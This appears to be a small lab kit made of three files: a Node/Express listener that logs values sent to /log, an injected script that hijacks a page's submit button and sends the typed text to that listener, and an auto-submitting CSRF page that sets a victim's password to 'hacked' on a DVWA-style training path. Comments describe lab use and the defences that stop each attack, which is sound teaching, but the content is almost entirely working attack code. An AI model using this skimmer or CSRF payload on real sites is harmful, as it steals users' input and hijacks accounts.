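'use strict';

// Minimal HTTP listener for a local lab: it records whatever arrives in the
// `data` query parameter of GET /log and always answers 200.
//
// Every logged value (the query string and the Host header alike) is chosen
// by the client, so it is escaped before it reaches the console. Otherwise a
// request could embed line breaks or terminal escape sequences and forge or
// corrupt log entries.
const express = require('express');

const app = express();
const port = 3000;

/**
 * Render an untrusted value as one printable log line.
 *
 * Non-string values (Express parses repeated or bracketed query keys into
 * arrays/objects) are serialised as JSON so their structure stays visible.
 * C0/C1 control characters and DEL are replaced by a visible \xNN escape.
 *
 * @param {unknown} value - client-supplied value to be logged
 * @returns {string} single-line, control-character-free representation
 */
function toLogSafe(value) {
  const text = typeof value === 'string' ? value : JSON.stringify(value);
  return String(text).replace(
    /[\u0000-\u001f\u007f-\u009f]/g,
    (ch) => `\\x${ch.charCodeAt(0).toString(16).padStart(2, '0')}`,
  );
}

app.get('/log', (req, res) => {
  const receivedData = req.query.data;

  if (receivedData) {
    // The Host header and the original URL are client-controlled as well.
    const url = `${req.protocol}://${req.get('host')}${req.originalUrl}`;
    console.log(`URL received: ${toLogSafe(url)}`);
    console.log(`Data received: ${toLogSafe(receivedData)}`);
  } else {
    // Reached when `data` is absent or empty.
    console.log('URL received, but data is undefined');
  }

  res.sendStatus(200);
});

// No host argument is passed, so Node listens on every interface, not only
// loopback. The endpoint is unauthenticated; keep it on an isolated lab host.
app.listen(port, () => {
  console.log(`Listening server running at http://localhost:${port}`);
});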
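<script>
  /**
   * Send one value to the local logging endpoint as a GET query parameter.
   *
   * The value travels in the URL over plain HTTP, so it is recorded by the
   * receiving server and by any proxy on the path. A Content-Security-Policy
   * with a restrictive connect-src on the hosting page would block this
   * request, and output encoding on that page would stop a script like this
   * one from being injected in the first place.
   *
   * @param {string} data - value to transmit; percent-encoded before sending
   */
  function sendData(data) {
    const xhr = new XMLHttpRequest();
    xhr.open('GET', `http://localhost:3000/log?data=${encodeURIComponent(data)}`, true);
    xhr.send();
  }

  // Hook the page's first submit button. preventDefault() stops the form's own
  // submission, so the text value is only sent to the logging endpoint.
  document.querySelector('input[type="submit"]').addEventListener('click', function (e) {
    e.preventDefault();
    // Read at click time so the current content of the first text input is sent.
    const userInput = document.querySelector('input[type="text"]').value;
    sendData(userInput);
  });
</script>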
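<!DOCTYPE html>
<!--
  Test page for a cross-site request forgery (CSRF) check against a password
  change endpoint. The path /vulnerabilities/csrf/ looks like a deliberately
  vulnerable training application; confirm the target is a lab instance.

  What the page shows: the form below is submitted automatically on load and
  carries a new password plus its confirmation, but neither the current
  password nor an anti-CSRF token. The request can only succeed when the
  server accepts a state-changing request on the strength of the browser's
  ambient session cookie alone.

  Server-side controls that make this request fail:
    * a per-session or per-request anti-CSRF token that is validated on submit
    * session cookies marked SameSite=Lax or SameSite=Strict
    * requiring the current password for a password change
    * rejecting requests whose Origin or Referer is not the application itself
-->
<html>
  <head>
    <title>CSRF Exploit</title>
    <script>
      // Submits the hidden form without user interaction; called from onload.
      function submitForm() {
        document.getElementById('exploit-form').submit();
      }
    </script>
  </head>
  <body onload="submitForm()">
    <!-- <IP_Address> is a placeholder for the lab host. -->
    <form id="exploit-form" action="http://<IP_Address>/vulnerabilities/csrf/" method="POST">
      <input type="hidden" name="password_new" value="hacked" />
      <input type="hidden" name="password_conf" value="hacked" />
      <input type="hidden" name="Change" value="Change" />
    </form>
  </body>
</html>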